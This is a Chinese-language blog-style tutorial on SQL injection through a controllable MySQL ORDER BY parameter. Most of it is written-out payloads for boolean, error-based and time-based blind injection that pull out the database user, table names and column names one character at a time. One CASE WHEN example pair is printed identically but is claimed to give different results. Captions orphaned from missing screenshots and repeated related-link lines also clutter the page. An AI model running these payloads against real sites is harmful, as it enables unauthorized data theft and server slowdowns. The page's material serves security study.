Mysql Order By注入總結

本文討論的內容指可控制的位置在order by子句後，如下order引數可控

"select * from goods order by $_get['order']"

在早期注入大量存在的時候利用order by子句進行快速猜解列數，再配合union select語句進行回顯。可以通過修改order引數為較大的整數看回顯情況來判斷。在不知道列名的情況下可以通過列的的序號來指代相應的列。但是經過測試這裡無法做運算，如order=3-1和order=2是不一樣的

錯誤

正常

前面的判斷並不是絕對的，我們需要構造出類似and 1=1、and 1=2的payload以便於注入出資料

通過name欄位排序通過price欄位排序

/?order=(case+when+(1=1)+then+name+else+price+end) 通過name欄位排序
/?order=(case+when+(1=1)+then+name+else+price+end) 通過price欄位排序

通過name欄位排序通過price欄位排序

可以觀測到排序的結果不一樣

在有些情況下無法知道列名，而且也不太直觀的去判斷兩次請求的差別，如下用if語句為例

正確

錯誤

/?order=if(1=1,1,(select+1+from+information_schema.tables))  正常
/?order=if(1=2,1,(select+1+from+information_schema.tables)) 錯誤

正常

錯誤

正確

錯誤

正確

錯誤

注意如果直接if(1=2,1,sleep(2))，sleep時間將會變成2*當前表中記錄的數目，將會對伺服器造成一定的拒絕服務攻擊

/?order=if(1=1,1,(select(1)from(select(sleep(2)))test)) 正常響應時間
/?order=if(1=2,1,(select(1)from(select(sleep(2)))test)) sleep 2秒

以猜解user()即root@localhost為例子，由於只能一位一位猜解，可以利用substr,substring,mid,以及left和right可以精準分割出每一位子串。然後就是比較操作了可以利用=,like,regexp等。這裡要注意like是不區分大小寫

通過下可以得知user()第一位為r,ascii碼的16進製為0x72

正確

錯誤

猜解當前資料的表名

/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x67,1,0x00))  正確
/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x66,1,0x00)) 錯誤

猜解指定表名中的列名

/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x69,1,0x00)) 正常
/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x68,1,0x00)) 錯誤

在沒有過濾的情況下是能夠檢測到注入的

Mysql Order By注入總結

MYSQL order by排序與索引關係總結

MYSQL order by排序與索引關係總結

mysql 報錯注入寫檔案 mysql注入總結

Mysql Order By注入總結

MYSQL order by排序與索引關係總結

MYSQL order by排序與索引關係總結

mysql 報錯注入寫檔案 mysql注入總結

相關推薦